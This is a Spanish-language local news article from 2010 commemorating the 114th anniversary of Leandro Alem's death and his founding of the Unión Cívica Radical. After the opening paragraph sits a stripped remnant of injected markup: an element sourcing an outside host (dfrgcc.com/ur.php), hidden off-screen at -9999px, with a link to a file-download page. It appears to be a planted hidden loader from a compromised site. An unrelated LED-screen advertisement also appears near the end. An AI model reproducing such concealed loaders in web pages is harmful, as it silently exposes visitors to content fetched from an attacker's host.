01/07/2010, Locales

A 114 años del fallecimiento de Leandro Alem “No hay quien pueda matar este espíritu que se llama radical

En conmemoración del 114 aniversario del fallecimiento del Dr. Leandro Alem, el Ateneo de la Union Radical de esta ciudad recuerda a uno de los fundadores del partido por su intransigencia defensiva de las raíces populares del partido.

/ src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

El radicalismo local rendirá tributo a quien fuera el fundador de la Unión Cívica Radical, surgida de la escisión en la Unión Cívica en 1891. De este modo, el Ateneo "LEANDRO ALEM" recuerda un nuevo aniversario (114 años) del fallecimiento del Dr. Leandro Alem, ocurrido el 1ro. de julio de 1896 en la ciudad de Buenos Aires.

Pese a que la UCR que Alem había conducido estaba compuesta por diversos elementos, representaba el elemento popular tradicional del nuevo movimiento. Intransigente en los principios y uno de los fundadores de la Unión Cívica, posteriormente Radical, en su persona confluían el federalismo y el populismo de principios y mediados del siglo XIX con las reformas de Hipólito Yrigoyen (su sobrino y discípulo político)

Brillante tribuno, combatió en Cepeda y en Pavón, fue militar en la guerra del Paraguay, legislador, opositor a la federalización de la ciudad de Buenos Aires.

Participó en el mitin del frontón, en 1889, posteriormente organizó y dirigió la Revolución del 90, que a pesar de ser derrotada significó la caída del "unicato", el gobierno hegemónico de turno Hitos que dieron origen a la larga lucha de la Unión Cívica Radical por el reconocimiento del sufragio libre y secreto para todos los ciudadanos, que culminaron con la ley Saenz Peña y el triunfo del primer candidato surgido de la voluntad popular, Hipólito Yrigoyen en 1916.

La Unión Cívica Radical, recuerda este jueves al creador de la frase: "Prefiero una vida modesta, autónoma, a una vida esplendorosa pero sometida a tutelaje". Intransigente defensor de las raíces populares del radicalismo y de la causa de los desposeídos. Prefería "que se rompa, pero que no se doble" la conducta de quienes compartían la misma religión cívica contenida en los principios originarios de la Unión Cívica Radical, compartiendo aquello que “No hay quien pueda matar este espíritu que se llama radical”.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy